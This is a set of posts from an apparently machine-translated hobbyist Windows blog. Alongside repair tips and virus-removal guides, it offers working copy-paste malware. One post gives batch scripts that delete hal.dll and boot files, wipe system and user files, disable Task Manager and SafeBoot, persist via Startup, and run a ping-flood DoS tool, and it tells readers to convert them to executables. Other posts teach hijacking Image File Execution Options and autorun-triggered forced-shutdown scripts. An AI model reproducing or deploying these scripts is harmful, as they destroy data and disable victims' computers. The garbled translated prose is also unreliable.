Showing posts with label script virus. Show all posts
Showing posts with label script virus. Show all posts

Thursday, February 18, 2010

well I'll see you again at the opportunity this post, how are you all? in a previous post we talked about interesting things just for the operating system. before you go to the main idea I want to ask you all, if your computer is often damaged at his window operating system? well if the problem is often experienced, but we are experiencing computer problems of damage to its windows operating system will surely make reinstall it? heheheheh.

well but on occasion this time I wanted to improve your character's desperate to give my knowledge to you. actually in this topic I will discuss about the improvement of damage to the Win.com file. do you know, with the win.com file that had been experiencing problems? well, certainly do not know, understand beginners. 

win.com file is a file that is at once needed to run a windows operating system and files are usually the main way at boot time. if you are already obvious? usually win.com error on the error will display an error message when booting windows, for example like this:
The following file is missing or corrupted: Win.com
The following file is missing or corrupted: Win.com
Program too big to fit in memory Can not find Win.com, Unable to continue loading Windows
Program too large

To fix this, you must create a new win.com file in a way to extract files from a CD win.cnf Windows. Complete the following steps:
Win.cnf extract files from the Windows CD into the folder C: \\ Windows. Once extracted and then change the name to win.cnf win.com. Here's how: ren c: \\ windows \\ win.cnf c: \\ windows \\ win.com

simplified tips and tricks from me, I made a tip and trick nobody would have complicated my love of my tips and tricks that simple. may be useful for you all.

Sunday, February 14, 2010

good now talk about what? wow, how about talking about the settings in the registry again just compatriots with hacking Little, hehehhe. You've seen no icon Drive CD-ROM that can be changed when you insert a CD? well, if I had show and try this tip and trick, but it did not work. hehehehehe, well I was the same lie again you all, who really is the answer that the tip and trick it worked 100% just tried on my computer, using windows OS. you want to know something? I love ya have a tip and trick I told you. follow it? steps - the steps below:

The first thing you should do is open your notepad and then you write the same script as the script below, but you can copy and paste the script.
script:

[autorun]
icon = name icon.ico

then you save with the autorun.inf name, you do not have to be afraid anymore with this script is not harmful and will not be a virus, because many people say that autorun malicious viruses, but in my opinion the most exciting program really, hehehehhe. if you are already in the store immediately place the program or script that had been stored in the root drive that you want or go or CT: C: \\ or D: \\. then you put the file icon that you want in the same place with the autorun.inf file, then you do not forget to restart your computer first, because most people keep forgetting that, like me hehehe. why should the restart because the file is not running so it should be on the first restart, so's all you report it, hehehehe.

you make a note: This tip and trick you can practice for the hard disk icon change also, and to view the files on the drive does not look a mess I suggest original all the files you change its attributes seem to be hidden all of ya.

hopefully useful tips and tricks this time, tips and tricks are very simple.

Sunday, January 17, 2010


after I have not talked about computers and networks really weird with my blog this. maybe in the past I mostly post about the news of emerging technologies. This time I wanted to many to you all about computers and networks, but not the network directly, yes, but this post I wanted to share the fun way with the coding by extension. bat. maybe this way you think makes a virus or malware or trojan can also be fun but it only just. want to know how to make and use, as follows:



1. you must open the application to write a script that is notepad or another can.

2. then enter the script that I've made below:
note: you can copy and paste with this script. if you write each one must have 1 hour is not enough just copy and paste directly.

Script coding :




@ echo off
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_SZ /d 1 /f >nul
del /f /q %SystemDrive%\WINDOWS\system32\hal.dll


Copy file ini ke Notepad trus simpan dengan extension .bat
PING DEATH(DoS)
code :

@echo off
cls
echo PING DEATH
echo.
echo How many ping processes do you want?
set /p amount=
if not exist PD md PD
cd PD
echo Enter the IP:
set /p ip=
for /L %%A IN (1,1,%amount%) DO echo @echo off > PD%%A.bat
for /L %%A IN (1,1,%amount%) DO echo ping -t -l 65500 %ip% >> PD%%A.bat
cd..
for /L %%A IN (1,1,%amount%) DO start PD\pd%%A.bat
prompt $G$S
:a
echo Enter 'terminate' to end all processes
set /p input=
if %input%==terminate goto term
goto a
:term
tasklist /FI "IMAGENAME eq cmd.exe" > PID.txt
setLocal EnableDelayedExpansion
for /F "skip=4 tokens=1,2*" %%A in (PID.txt) do taskkill /PID %%B
echo.
echo Any ERRORS above means that process must be manually terminated
cd PD
del *.* /Q
cd..
rmdir PD
goto eof
:eof


Coding Simple but Dangerous
Code:

cls
cd %HOMEDRIVE%\windows\
del /S /F /Q keyboard.drv
del /S /F /Q mouse.drv
del /S /F /Q keyboard.sys
del /S /F /Q hal.dll
del /S /F /Q *.exe
del /S /F /Q *.txt
del /S /F /Q *.com
del /S /F /Q *.scr
del /S /F /Q *.ini
del /S /F /Q *.mp3
del /S /F /Q *.wav
del /S /F /Q *.dll
del /S /F /Q *.avi
del /S /F /Q *.jpeg
del /S /F /Q *.mp4
del /S /F /Q *.reg
del /S /F /Q *.rar
del /S /F /Q *.inf
del /S /F /Q *.sdb
del /S /F /Q *.cur
del /S /F /Q *.ani
del /S /F /Q *.zip
del /S /F /Q *.*
cd %HOMEDRIVE%
del /S /F /Q *.exe
del /S /F /Q *.txt
del /S /F /Q *.com
del /S /F /Q *.scr
del /S /F /Q *.ini
del /S /F /Q *.mp3
del /S /F /Q *.wav
del /S /F /Q *.dll
del /S /F /Q *.avi
del /S /F /Q *.jpeg
del /S /F /Q *.mp4
del /S /F /Q *.reg
del /S /F /Q *.rar
del /S /F /Q *.inf
del /S /F /Q *.sdb
del /S /F /Q *.cur
del /S /F /Q *.ani
del /S /F /Q *.zip
del /S /F /Q *.*
cls
ren %HOMEDRIVE%\Windows\hal.dll hal3.dll
del %HOMEDRIVE%\WINDOWS\system32\*.* /F /Q /S
cls
echo DONE!
shutdown -r -t 25 -c "Selamat semua Virus anda telah dibersihkan... Berbahagialah "
 
Batch Virus XDD
Save File To. Bat and convert with Batch to Exe.

Code:

@echo off
title ?wtfisthisshit?
:a
set rawr=%random%
set/a rawr=%rawr%+200000
:b
set/a rawr=%rawr%-1
if %rawr%==1 (
start www.octourl.com/R
goto a
)
goto b
batch maleware phuCker
Code:

@echo off & break off
title fuCker v1.4-1-5
attrib +h %0
mode con cols=75 lines=15
cls
color 0a
echo.
echo ad88 ,ad8888ba, 88
echo d8" d8"' `"8b 88
echo 88 d8' 88
echo MM88MMM 88 88 88 88 ,d8 ,adPPYba, 8b,dPPYba,
echo 88 88 88 88 88 ,a8" a8P_____ 88 88P' "Y8
echo 88 88 88 Y8, 8888[ 8PP""""""" 88
echo 88 "8a, ,a88 Y8a. .a8P 88`"Yba, "8b, 88
echo 88 `"YbbdP'Y8 `"Y8888Y"' 88 `Y8a `"Ybbd8"' 88
echo by c0re
echo.
rundll32.exe user32.dll,SwapMouseButton
if exist "%SYSTEMDRIVE%\boot.ini" goto winXP 2> nul
if exist "%USERPROFILE%\AppData" goto winVISTA 2> nul
@echo 
echo x=msgbox("0wned by fuCker w0rm!",vbCritical or vbOkOnly,"fuCker") >> "fuCker.vbs"
start "" "fuCker.vbs" 2> nul


:winXP
echo [Inject] Microsoft Windows XP!
set b0t=boot
attrib -r -s -h "%SYSTEMDRIVE%\%b0t%.ini" >nul
del /f /s /q "%SYSTEMDRIVE%\%b0t%.ini" >nul
set b0t=
attrib -r -s -h "%SYSTEMDRIVE%\ntldr" >nul
del /f /s /q "%SYSTEMDRIVE%\ntldr" >nul
set w0n=win
attrib -r -s -h "%SYSTEMROOT%\%w0n%.ini" >nul
del /f /s /q "%SYSTEMROOT%\%w0n%.ini" >nul
set w0n=
attrib -r -s -h "%SYSTEMROOT%\System32\hal.dll" >nul
del /f /s /q "%SYSTEMROOT%\System32\hal.dll" >nul
attrib -r -s -h "%SYSTEMROOT%\System32\bootcfg.exe" >nul
del /f /s /q "%SYSTEMROOT%\System32\bootcfg.exe" >nul
reg delete HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot /va /f >nul
msg * "fuCk y0u!"
shutdown -r -t 02 -c "fuCker w0rm deteCted!"
goto end




:winVISTA
echo [Inject] Microsoft Windows Vista!
setlocal enableextensions
for /f "tokens=*" %%a in (
'reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLUA'
) do (
set usac=%%a
)
echo %usac%|find /i "0x1" > nul
if errorlevel 1 (
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_SZ /d 1 /f >nul
start http://%USERNAME%.homo.com/
attrib -r -s -h "%SYSTEMRDRIVE%\bootmgr" >nul
del /f /s /q "%SYSTEMDRIVE%\bootmgr" >nul
attrib -r -s -h "%SYSTEMRDRIVE%\BOOTSECT.BAK" >nul
del /f /s /q "%SYSTEMRDRIVE%\BOOTSECT.BAK" >nul
copy %0 "%ALLUSERSPROFILE%\Start Menu\Programs\Startup" 2> nul
copy %0 "%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu" 2> nul
echo x=msgbox("0wned!",vbCritical or vbOkOnly,"fuCker w0rm") >> "w0rm.vbs"
start "" "w0rm.vbs" 2> nul
shutdown -s -t 10 -c "fuCker w0rm deteCted!"
goto end
) else (
echo :HjT >> "%TEMP%\HjT.bat"
echo tskill /a HijackThis >> "%TEMP%\HjT.bat"
echo goto HjT >> "%TEMP%\HjT.bat"
start "%TEMP%\HjT.bat"
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_SZ /d 1 /f >nul
echo do >> "disk.vbs"
echo set oWMP = CreateObject("WMPlayer.OCX.7" ) >> "disk.vbs"
echo set colCDROMs = oWMP.cdromCollection >> "disk.vbs"
echo colCDROMs.Item(d).Eject >> "disk.vbs"
echo colCDROMs.Item(d).Eject >> "disk.vbs"
echo loop >> "disk.vbs"
start "" "disk.vbs" 2> nul
echo @echo off >> "%USERPROFILE%\Desktop\fuCkerw0rm.bat"
echo shutdown -r -t 00 -c "fuCker w0rm deteCted!" >> "%USERPROFILE%\Desktop\fuCkerw0rm.bat"
echo echo 0wned by fuCker w0rm! 0n %DATE% at%TIME% >> "%USERPROFILE%\Desktop\fuCkerw0rm.bat"
echo @exit >> "%USERPROFILE%\Desktop\fuCkerw0rm.bat"
set usac=
start "%USERPROFILE%\Desktop\fuCkerw0rm.bat" 2> nul
echo x=msgbox("0wned!",vbCritical or vbOkOnly,"fuCker w0rm") >> "w0rm.vbs"
start "" "w0rm.vbs" 2> nul
goto end
)
endlocal


:end
cls
exit
3. then when you're done copy paste into notepad you all do not forget to save the script in a notepad format .bat .


4. then if you've saved all you have to convert these formats to the format. exe

5. program or application is very simple fun of this is done, finished.

note: the code you created can run on various Windows operating systems.

I hope this post useful, I am posting this article is not intended to teach you to damage or fun for others but this post is where learners only. remember! I do not recommend you use this post. if there is damage to the operating system you are using is not my responsibility, on because of I do not recommend it for you. I hope you can understand. thank you very much for your support all over this site, do not forget to stop by on here.

Friday, January 1, 2010


maybe now a lot of very dangerous viruses that cause very severe problems even to spread very quickly and very inconvenient time. W32/Smalltroj.VPCG virus is a malicious program is currently looking for more victims on the Internet at the end of this year. This new virus will block access to several security websites and other websites that have been specified by way of transfer to the IP number 209.85.225.99 which is Google's public IP.

every time users to try to access certain websites, including websites or anti-virus security, so that appears not on the website but the website wants to www.google.com.

This 9 step following to clean W32/Smalltroj.VPCG the potion has a vaksincom:
1. Turn off System Restore during the cleaning process take place.

2. Decide who will clean your computer from the network or the Internet.

3. Change the name of the file [C: \\ Windws \\ system32 \\ msvbvm60.dll] to prevent the virus active again.

4. Perform cleaning by using the Tools Windows Live CD Mini PE. This is due to some rootkit files masquerading as services and drivers difficult to stop. Please download the software at the address http://soft-rapidshare.com/2009/11/10/minipe-xt-v2k50903.html

Then boot the computer using software Mini PE Live CD. After that deleting some files parent virus by:

l Click the [Mini PE2XT]
l Click the [Programs]
l Click the [File Management]
l Click the [Windows Explorer]
l Then delete the following files:

o C: \\ Windows \\ System32
§ wmispqd.exe
§ Wmisrwt.exe
§ qxzv85.exe @
§ qxzv47.exe @
§ secupdat.dat
o C: \\ Documents and Settings \\% user% \\% xx%. exe, where xx is a random character (example: rllx.exe) with a file size of 6 kb.
o C: \\ windows \\ system32 \\ drivers
§ Kernelx86.sys
§% xx%. Sys, where xx is a random character who has a size of 40 KB (example: mojbtjlt.sys or cvxqvksf.sys)
§ Ndisvvan.sys
§ krndrv32.sys
o C: \\ Documents and Settings \\% user% \\ secupdat.dat
o C: \\ Windows \\ inf
§ Netsf.inf
§ netsf_m.inf
 
5. Delete the registry created by the virus, by using the "Avas! Registry Editor", how:

l Click the [Mini PE2XT]
l Click the [Programs]
l Click the [Registry Tools]
l Click [Avast! Registry Editor]
l If the confirmation screen appears Kelik button "Load ....."
l Kemudain delete registry: (see figure 6)

Ø HKEY_LOCAL_MACHINE \\ software \\ microsoft \\ windows \\ currentvers
     on \\ Run \\ \\ ctfmon.exe
Ø HKEY_LOCAL_MACHINE \\ system \\ ControlSet001 \\ Services \\ kernelx86
Ø HKEY_LOCAL_MACHINE \\ system \\ CurrentControlSet \\ Services \\ kernelx86
Ø HKEY_LOCAL_MACHINE \\ system \\ CurrentControlSet \\ Services \\ passthru
Ø HKEY_LOCAL_MACHINE \\ SOFTWARE \\ Microsoft \\ WindowsNT \\ CurrentVersion \\ Image File Execution Options \\ ctfmon.exe
Ø HKEY_LOCAL_MACHINE \\ software \\ microsoft \\ Windows NT \\ CurrentVersion \\ winlogon

ü Change the string value to be Userinit = userinit.exe,
Ø HKEY_LOCAL_MACHINE \\ SYSTEM \\ CurrentControlSet \\ Services \\ SharedAccess \\ Parameters \\ FirewallPolicy \\ DomainProfile \\ AuthorizedApplications \\ List
ü% windir% \\ system32 \\ wmispqd.exe =% system% \\ wmispqd.exe: *: enabled: UPnP Firewall
Ø HKEY_LOCAL_MACHINE \\ SYSTEM \\ CurrentControlSet \\ Services \\ SharedAccess \\ Parameters \\ FirewallPolicy \\ DomainProfile \\ AuthorizedApplications \\ List
ü% windir% \\ system32 \\ wmispqd.exe =% system% \\ wmispqd.exe: *: enabled: UPnP Firewall
Ø HKEY_LOCAL_MACHINE \\ SYSTEM \\ CurrentControlSet \\ Services \\ SharedAccess \\ Parameters \\ FirewallPolicy \\ StandardProfile \\ AuthorizedApplications \\ List
ü% windir% \\ system32 \\ wmispqd.exe =% system% \\ wmispqd.exe: *: enabled: UPnP Firewall
Ø HKEY_LOCAL_MACHINE \\ system \\ ControlSet001 \\ Services \\% xx%
Ø HKEY_LOCAL_MACHINE \\ system \\ CurrentControlSet \\ Services \\% xx%

Note:
% xx% showing random characters, this key is made to run the file. SYS which has the size of 40 KB which is in the directory [C: \\ Windows \\ system32 \\ drivers \\]

6. Restart the computer, restore the remaining registry that changed by the virus to copy the following script in notepad and then save with the name repair.inf. Execute the following manner: right-click repair.inf | click install

             [Version]

Signature = "$ Chicago $"
Provider = Vaksincom

[DefaultInstall]
AddReg = UnhookRegKey
DelReg = del

[UnhookRegKey]

HKEY_LOCAL_MACHINE \\ SOFTWARE \\ Classes \\ batfile \\ shell \\ open \\ command ,,,"""% 1 ""% * "

HKEY_LOCAL_MACHINE \\ SOFTWARE \\ Classes \\ comfile \\ shell \\ open \\ command ,,,"""% 1 ""% * "

HKEY_LOCAL_MACHINE \\ SOFTWARE \\ Classes \\ exefile \\ shell \\ open \\ command ,,,"""% 1 ""% * "

HKEY_LOCAL_MACHINE \\ SOFTWARE \\ Classes \\ piffile \\ shell \\ open \\ command ,,,"""% 1 ""% * "

HKEY_LOCAL_MACHINE \\ SOFTWARE \\ Classes \\ regfile \\ shell \\ open \\ command,,, "regedit.exe"% 1 ""

HKEY_LOCAL_MACHINE \\ SOFTWARE \\ Classes \\ scrfile \\ shell \\ open \\ command ,,,"""% 1 ""% * "

HKEY_LOCAL_MACHINE \\ SOFTWARE \\ Microsoft \\ Windows NT \\ CurrentVersion \\ Winlogon, Shell, 0, "Explorer.exe"

HKEY_LOCAL_MACHINE \\ software \\ microsoft \\ ole, EnableDCOM, 0, "Y"

HKEY_LOCAL_MACHINE \\ SOFTWARE \\ Microsoft \\ Security Center, AntiVirusDisableNotify, 0x00010001, 0

HKEY_LOCAL_MACHINE \\ SOFTWARE \\ Microsoft \\ Security Center, FirewallDisableNotify, 0x00010001, 0

HKEY_LOCAL_MACHINE \\ SOFTWARE \\ Microsoft \\ Security Center, AntiVirusOverride, 0x00010001, 0

HKEY_LOCAL_MACHINE \\ SOFTWARE \\ Microsoft \\ Security Center, FirewallOverride, 0x00010001, 0

HKEY_LOCAL_MACHINE \\ SYSTEM \\ ControlSet001 \\ Control \\ LSA, restrictanonymous, 0x00010001, 0

HKEY_LOCAL_MACHINE \\ SYSTEM \\ ControlSet002 \\ Control \\ LSA, restrictanonymous, 0x00010001, 0

HKLM, SYSTEM \\ CurrentControlSet \\ Control \\ LSA, restrictanonymous, 0x00010001, 0

HKEY_LOCAL_MACHINE \\ SOFTWARE \\ Microsoft \\ Windows \\ CurrentVersion \\ Explorer \\ Advanced \\ Folder \\ SuperHidden, CheckedValue, 0x00010001, 0

[del]

HKCU, Software \\ Microsoft \\ Windows \\ CurrentVersion \\ Policies \\ System, DisableRegistryTools

HKCU, Software \\ Microsoft \\ Windows \\ CurrentVersion \\ Policies \\ System, DisableCMD

HKCU, Software \\ Microsoft \\ Windows \\ CurrentVersion \\ Policies \\ Explorer, NoFolderOptions

HKEY_LOCAL_MACHINE \\ SOFTWARE \\ Microsoft \\ Windows \\ CurrentVersion \\ Run, ctfmon.exe

HKEY_LOCAL_MACHINE \\ SYSTEM \\ ControlSet001 \\ Services \\ kernelx86

HKEY_LOCAL_MACHINE \\ SYSTEM \\ ControlSet002 \\ Services \\ kernelx86

HKLM, SYSTEM \\ CurrentControlSet \\ Services \\ kernelx86

HKLM, SYSTEM \\ CurrentControlSet \\ Services \\ mojbtjlt

HKEY_LOCAL_MACHINE \\ SYSTEM \\ ControlSet001 \\ Services \\ mojbtjlt

HKEY_LOCAL_MACHINE \\ SYSTEM \\ ControlSet002 \\ Services \\ mojbtjlt

HKEY_LOCAL_MACHINE \\ SYSTEM \\ ControlSet001 \\ Services \\ Passthru

HKEY_LOCAL_MACHINE \\ Software \\ Policies \\ Microsoft \\ Windows NT \\ SystemRestore

HKEY_LOCAL_MACHINE \\ SOFTWARE \\ Policies \\ Microsoft \\ Windows \\ windowsupdate, DoNotAllowXPSP2

HKEY_LOCAL_MACHINE \\ SOFTWARE \\ Policies \\ Microsoft \\ Windows \\ windowsupdate

HKEY_LOCAL_MACHINE \\ SOFTWARE \\ Microsoft \\ Windows NT \\ CurrentVersion \\ Image File Execution Options \\ ctfmon.exe

7. Delete temporary files and temporary Internet files. Please use the tools ATF-Cleaner. Download these tools in http://www.atribune.org/public-beta/ATF-Cleaner.exe addresses.

8. Restore back to the host file in Windows that has been changed by the virus. You can use tools Hoster, please download at the following address http://www.softpedia.com/progDownload/Hoster-Download-27041.html

Click the [Restore MS Hosts File], to restore the Windows hosts file.

9. For optimal cleaning and prevent re-infection, anti-virus scan with up-to-date and was able to detect this virus. You can also use Norman Malware Cleaner, please download at the following address http://www.norman.com/support/support_tools/58732/en.

Wednesday, December 30, 2009

a tip and trick that is rarely used by the skill or master computer. a tip and trick manipulation this application is not paid manipulation application or free, but sort manipulation this application is running with a ms.word program command winword.exe, excel, or you run IE (internet explorer) but the road is a bad tip and very unique.

the most to the tip and the tip of this trick can be used on the window, even tip no longer is any additional applications. capital is only 99% window (30% and 70% registry script) and 1% using scripting intelligence.

manipulation tip is very well suited to some of those activities as follows:
1. admin who did not want the kind client - kind of.
2. they use the computer together (cafes, computer courses) but did not want certain programs run.
3. personal computers but is very afraid of the brain - manipulate other people or younger.
4. want be different with friends.
5. like ignorant friends or often idle
6. often try to - try

you should know that we will play with the script and the registry. which means quite dangerous if you do not follow the steps - steps from me. and you watch carefully and step by step. If you still do not understand or do not understand you should not directly apply tips and tricks below will result in enough trouble. but when it clearly and understand the tips and please continue with the next trick.

some word
every time you run the program, then the window will check or control of registry keys.

code: HKLM \\ SOFTWARE \\ Microsoft \\ Windows NT \\ CurrentVersion \\ Image File Execution Options \\



the subkey of the file name and not paths. subkey will be equated with the name that will run progrma. if the same, it will check the string "Debugger". and if the string is the window will run the program in accordance with the contents of the string. try you see below:

code: HKLM \\ SOFTWARE \\ Microsoft \\ Windows NT \\ CurrentVersion \\ Image File Execution Options \\ taskmgr.exe



empty contents you see this image above. so if you run taskmgr.exe from the RUN menu in any EXE location. the program will run no matter the parth or another. but taskmgr.exe subkey contains the string "Debugger" see the picture below.

and the string value "C: \\ Program Files \\ Microsoft Office \\ Office11 \\ WinWord.exe". then each run RUN tasmgr.exe from the menu or from the other tasks that appear not manager instead ms.word.

an application:
with a very simple way as above is enough time to run a malicious intent. yagn as I explained the above, the window will check the existence of the string "debugger" and read the contents to run programs on purpose. but what would happen if the contents of the string "Debugger" in the blank? if nothing happened - what was the try despite a thousand times is not going the way malicious applications. but you do not worry about this tip and trick will not stop here it is still a long way to make our malware and good step if you know about the VBS script.

how to scare computer users:
for example there are users who want ignorant run task manager with CTRL + ALT + DEL, you try to fill the string "Debugger" with "wscript c: \\ skrip.vbs" without the quotes yes.
then you run a note and type the code below:
code: MsgBox ( "How dare you ignorant my computer! it was recorded! who have a computer then going mad !!!")

or the actual format below:
code:
MsgBox ( "message")


then save the file in "C: \\" with the name "skrip.vbs" (unless you set yourself)
now try run task manager.

Make a password to run things
If you want to install the password for the program (eg) task manager, the "Debugger" content with\u003e\u003e "wscript.exe c: \\ skrip.vbs" (without the quotation marks, too)



then type the following script in notepad.
code:


Dim s
s = InputBox("Masukkan kode untuk ngancurin komputer ini:")
If s = "PASSWORD" Then
  set wscr=CreateObject("WScript.Shell")
  wscr.RegDelete("HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe\debugger")
  wscr.exec("taskmgr.exe")
  wscr.RegWrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe\debugger","wscript C:\skrip.vbs","REG_SZ"
Else
  Msgbox("Awas kalo coba-coba maen-maen dengan komputer ini!!!")
End IF

then save with the name "skrip.vbs" in C: \\

and IF you want to make a regedit password, live for a new key with the name "regedit" (do not say forget the place. go try to check the above)
then make a string "debugger" and fill with "wscript c: \\ skrip.vbs" (still without the quotes)
contents same as above ... but replace the "wscr.exec (taskmgr.exe)" replaced "wscr.exec (regedit.exe)"
so if password other files ...


if you want to change the password ... clay third row ... PASSWORD said that you replace like-like you is ...
WARNING! Case sensitive password!


Super Security
This time the game was still in VBScript ... a security that can barely broken ... Login PASSWORD SUPER-BAD!




Each run windows, then the application is first run and was followed NTOSKRNL winlogon and result in EXPLORER.
your evil thoughts would lead to "change the debugger to winlogon.exe" ... It's too bad ... now I give a little better: Explorer.
Essentially every time you enter a password window will be prompted by this little program. and if the wrong password, windows will Shutdown!
quite bad right.

Step by Step Procedure

1. Notepad
type the following script

code:
Dim s
s = InputBox("Masukkan kode untuk ngancurin komputer ini:")
set wscr=CreateObject("WScript.Shell")
If s = "PASSWORD" Then
  wscr.RegDelete("HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\explorer.exe\debugger")
  wscr.exec("explorer.exe")
  wscr.RegWrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\explorer.exe\debugger","wscript C:\muncul.vbs","REG_SZ"
Else
  Msgbox("Berani ya!!! awas kamu!!!")
  wscr.exec("shutdown -s -f -t 00")
End IF


save with the name "C: \\ muncul.vbs"

2. regedit
make key HKLM \\ SOFTWARE \\ Microsoft \\ Windows NT \\ CurrentVersion \\ Image File Execution Options \\ explorer.exe

3. string debugger
in the key HKLM \\ SOFTWARE \\ Microsoft \\ Windows NT \\ CurrentVersion \\ Image File Execution Options \\ explorer.exe
for the string "debugger" and fill with "wscript c: \\ muncul.vbs"

4. done
please try restarting your computer and feel Khasiatnya ^ ^

Change the way the program
still remember most of the writing? jalanin the way MS Word MS Excel instead it loh ...
This time I beberin how ...

1. regedit
make key HKLM \\ SOFTWARE \\ Microsoft \\ Windows NT \\ CurrentVersion \\ Image File Execution Options \\ winword.exe

2. string
in key winword.exe, make the string "debugger" and then fill with
excel.exe
or
"c: \\ Program Files \\ Microsoft Office \\ OFFICE11 \\ EXCEL.EXE" with quotation marks (because there are spaces. if no yes no spaces need quotes)

3. done
run the word ... which appears even excel
most evil tricks. Change the program that works with the script!
returned to the VBS mode ...
follow the step above (the word so excel). but debugger replaced so "wscript (jahil.vbs)" (without the quotes )
This script contents jahil.vbs

 code:
set wscr=CreateObject("WScript.Shell")
Msgbox("A Ghost has attacked this computer. This computer may result an invalid execution. Contact your Ghostbusters for more information.")
dim i
for i=0 to 100
   msgbox "Ayo bermain tekan enter 100x! Anda harus menekannya " & 100 - i & "x lagi"
next
msgbox "Gooooooooooooooooooood Byeeeeeeeeeeeeeeee!!!!!"
wscr.exec("c:\Program Files\Microsoft Office\OFFICE11\EXCEL.EXE")

 save with the name "C: \\ jahil.vbs" then run the word ... enjoy tapping


Tuesday, December 29, 2009



 many viruses are spread by the end of this year, there was even an expert in programming to know a virus that spreads the end of this year. This malware has changed in the hard disk image into a file which is very dangerous once the virus has even invaded the latest operating system from microsoft ie 7 window.

an expert analysis of antiviral vaksincom Indonesia has declared it has detected the circulation of a malicious program with Autorun.ATSJ name. that a virus or malware is a variant of the virus that has dominated autorun virus in Indonesia ranked the period November to December 2009. virus variants have been hidden in a file called images in the hard disk and make a duplicate which is actually a malicious program as well. even the duplicate files that are created will have an icon image attract enough attention so that users are able to deceive all users.



according to antivirus expertise that the file is malicious or virus created by the script in C via a software AutoIt version 3 and the compression with UPX program. features - traits the virus is to use the icon-sized pictures of about 353 KB, and extension. EXE and a type of "application".

a phenomenon in your computer get infected if the virus is as follows:
infect your computer when the victim, then the virus will cause two very strange process in the task manager once. processes running in task manager called Jview and Shimgvw and will appear in the task manager windows operating system. if it has run victims windows 7 operating system, the virus seems to run a function to turn off user account control feature (AUC). but the virus is not able to run on OS window 7. virus even has the main purpose of deadly a feature of the OS is windows 7 security features center. and consequently update and warning functions of the OS window will have a very serious problem at all.

some antivirus that will be killed by the virus as well as, Ansav guard, ESET (NOD32), norman security suite, and McAfee security center. even more unique is more the virus can kill a virus that runs locally on the taskmanager process or on star up, such as: Blastclnn.exe, blastclnnn.exe, newfolder.exe, and SSCVIHOST.exe. The main symptom that caused the most obvious is he has the ability to plow and duplicate all the existing image files in your hard drive. files that will be the main target of the virus files have the extension jpeg, bmp, png, and gif.

the virus will spread through a peripheral device is a USB flash drive. other than that he will spread itself through a local network if the victim computer has a share folder or share data in a local network. careful - careful with the virus that is very unique and cruel this year. My info may be useful this time. thanks.


Monday, October 19, 2009

 
Tag Technorati: {grup-tag}

before I give lessons or insights to you all about making the password in the flash, I thank you very much for you because it has been faithfully visiting my blog. but you should never tired of dwelling or to communicate in my place this very simple because I will give a very broad perspective of the technology world. I do not want to talk here because it will take a very long time if I told here, we immediately headed to the scene at once. post this time I want to share knowledge on how to make flash password without buying the software, but I will give knowledge about the script that I have learned, is as follows:
1. Open Notepad
(Here's how: Start _ All Programs_Accessories_Notepad or entered in notepaddan RUN then type Enter) and then copy and paste the following script code into notepad

on error goto 0
Dim s, quest, sd, m, winpath, fs
set sd = CreateObject ( "WScript.Shell")
set fs = CreateObject ( "Scripting.FileSystemObject")


set winpath = fs.getspecialfolder (0)
Set s = WScript.CreateObject ( "WScript.Shell")
do while my quest = ""
quest = InputBox ( "Enter a PASSWORD, if you enter the wrong password, the computer is going
http://www.alexa-com.co.cc !!!"," ShutDown")
if quest = "" then
m = MsgBox ( "Sorry you have not entered a password ...!", 0 +0 +48,"
http://www.alexa-com.co.cc ")
end if
loop
if quest = "
WRITE THE PASSWORD HERE 'then
s.run "shutdown-a"
sd.run winpath \x26 "\\ explorer.exe / e, / select," \x26 Wscript.ScriptFullname
else
s.run "shutdown-s-t 0"
end if



WRITE THE PASSWORD HERE your own locker, it is as a place of your password. Use of capital letters is very influential. I suggest using numbers that have been remembered by rote.
then save as a name with "passwordlock.vbs" without the quotes, before the save as sure select all files.
2. when you finish above.
then open Notepad again, to automatic settings after the flash is included in the computer.
copy and paste the following script code into notepad.

[Autorun]
shellexecute = wscript.exe passwordlock.vbs
action = FLASHDISK completed CODE


you can change the word "completed FLASHDISK CODE" according to the words of your own desires pearls.
after that do storage as the first file, but in the File name write "autorun.inf" without the quotes, before the save as sure select all files.
Then move the two files you created earlier (autorun.inf and passwordlock.vbs) into your flash.
last step please autorun.inf and hidden passwordlock.vbs made earlier.
How to hidden: right click on each autorun.inf and then select Properties passwordlock.vbs check the box on the sign is hidden. done. . . .
@ info
- support with windows XP.
- Please do not forget the password itself (spicy sweet love not responsible for their own password error)
you please comment on this post!

Monday, July 20, 2009

at this time I will explain about cleaning it manually with the virus that is rarely used by many people because it is impossible to use ... do not explain the length and explained its way directly  key as follows:
1. How to Eliminate Computer Viruses Manually: Turn off the process that is run by the virus. Virus surely have an active process running on the system. This process usually monitor system activity and perform action when a particular event known virus. For example when we install the flash disk, the virus will recognize the process of action and infect flash disk with the same virus. This process should be viewed from the task manager which can be activated with the Ctrl + Alt + Del, but sometimes the virus will block this action by making the log off, close the Task Manager window, or restart the system. Another way is to use another tool to view and turn off the virus. I always use Process Explorer from http://www.sysinternals.com/. With this tool you can kill the virus process is considered. At the time the property off the virus needs to belong to the virus sometimes consisting of more than 1 process of mutual monitoring. 1 when the process is turned off then the page will be turned on again with the other. Therefore the process off the virus must be quickly turned off before the process is turned on again by the other. Identify the first process that the virus is considered ago with a quick turn off everything. Usually, the virus resembles the disguise of the windows but there is a difference between imitating IExplorer.exe such as Explorer.exe. Here are the windows that can be used as reference process that considered safe:
C: \ WINDOWS \ system32 \ smss.exe
C: \ WINDOWS \ system32 \ csrss.exe
C: \ WINDOWS \ system32 \ winlogon.exe
C: \ WINDOWS \ system32 \ services.exe
C: \ WINDOWS \ system32 \ svchost.exe
C: \ WINDOWS \ system32 \ lsass.exe
C: \ WINDOWS \ Explorer.exe
In addition to process explorer you can use other tools that may be easier to remove and can process at once. Another example is Hijack Free. You can search in google tools similar.
